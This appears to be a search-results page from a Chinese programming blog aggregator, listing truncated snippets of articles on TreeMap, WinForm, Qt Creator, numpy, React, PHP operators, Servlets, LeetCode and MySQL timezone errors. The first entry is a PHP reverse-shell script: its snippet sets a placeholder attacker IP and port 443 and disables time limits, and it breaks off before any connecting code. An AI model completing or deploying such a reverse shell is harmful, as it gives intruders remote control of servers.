码迷,mamicode.com
首页 >  
搜索关键字:ide    ( 18885个结果
PHP反弹脚本 Linux/Windows两用
<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $msg = php_unam ...
分类:Windows程序   时间:2021-07-05 19:00:38    阅读次数:0
有序表 TreeMap和TreeSet
TreeMap 与哈希表HashMap的区别: 有序表组织key,哈希表完全不组织。 **TreeMap关键点:**放入有序表中的元素,若不是基本类型,必须要有比较器,才能使其内部有序。 基本方法 Comparator<K> com = new Comparator<Integer>(){ @Ove ...
分类:其他好文   时间:2021-07-05 17:24:53    阅读次数:0
winform简易计算器
using System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using System.Drawing;using System.IO;using System.Linq;usi ...
分类:Windows程序   时间:2021-07-02 16:20:16    阅读次数:0
Qt:Qt Creator分屏显示代码
之前用VS、PyCharm、IntelliJ IDEA时,如果想分屏看代码,直接把某个Code文件拖到IDE之外就可以了。 而Qt Creator却不能这样做,不过这不代表Qt就不能分屏了:可以点击右上角的小箭头,实现分屏。 ...
分类:其他好文   时间:2021-07-02 15:48:28    阅读次数:0
Python数据分析(3)-numpy中nd数组的创建
ndarray的内存结构 和其他的库一样,每个库都可能有自己独特的数据结构,例如OpenCV,numpy库的多维数组叫做ndarray( N dimensionality array ),它的内存结构如下图: ndarray的内存结构 在这个结构体中有两个对象,一个是用来描述元素类型的头部区域,一个 ...
分类:编程语言   时间:2021-07-02 15:41:43    阅读次数:0
初识React
clsss要用className <div className=\"color-light\">文档的结构现在看来就是在互相引用小标题scss引入为了看着舒服和更快的选择标签,决定选择用scss,demo里自带了less,但相对来说scss更熟悉些,怎么搞都不成功 { test: /\\.(le|c ...
分类:其他好文   时间:2021-06-30 17:57:31    阅读次数:0
PHP 运算符
PHP 算数运算符 运算符名称例子结果显示结果 + 加法 $x + $y $x 与 $y 求和 显示结果 - 减法 $x - $y $x 与 $y 的差数 显示结果 * 乘法 $x * $y $x 与 $y 的乘积 显示结果 / 除法 $x / $y $x 与 $y 的商数 显示结果 % 取模 $x ...
分类:Web程序   时间:2021-06-30 17:32:51    阅读次数:0
JavaWeb13.3【Tomcat&Servlet:Servlet(server applet)】
1 <?xml version="1.0" encoding="UTF-8"?> 2 <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" 3 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ...
分类:移动开发   时间:2021-06-29 16:09:22    阅读次数:0
[LeetCode] 215. Kth Largest Element in an Array_Medium tag: Array, Heap
Given an integer array nums and an integer k, return the kth largest element in the array. Note that it is the kth largest element in the sorted order ...
分类:其他好文   时间:2021-06-28 20:35:29    阅读次数:0
使用idea连接数据库时报错 Server returns invalid timezone. Go to 'Advanced' tab and set 'serverTimezon
原因: mysql数据库的时区设置错误 解决办法: ①.Win+R 输入cmd 打开控制台 ②.打开数据库, 输入: mysql -uroot -p ③.查看数据库是否设置时区 show variables like '%time_zone%'; mysql> show variables like ...
分类:数据库   时间:2021-06-28 18:57:02    阅读次数:0
18885条   上一页 1 2 3 4 ... 1889 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!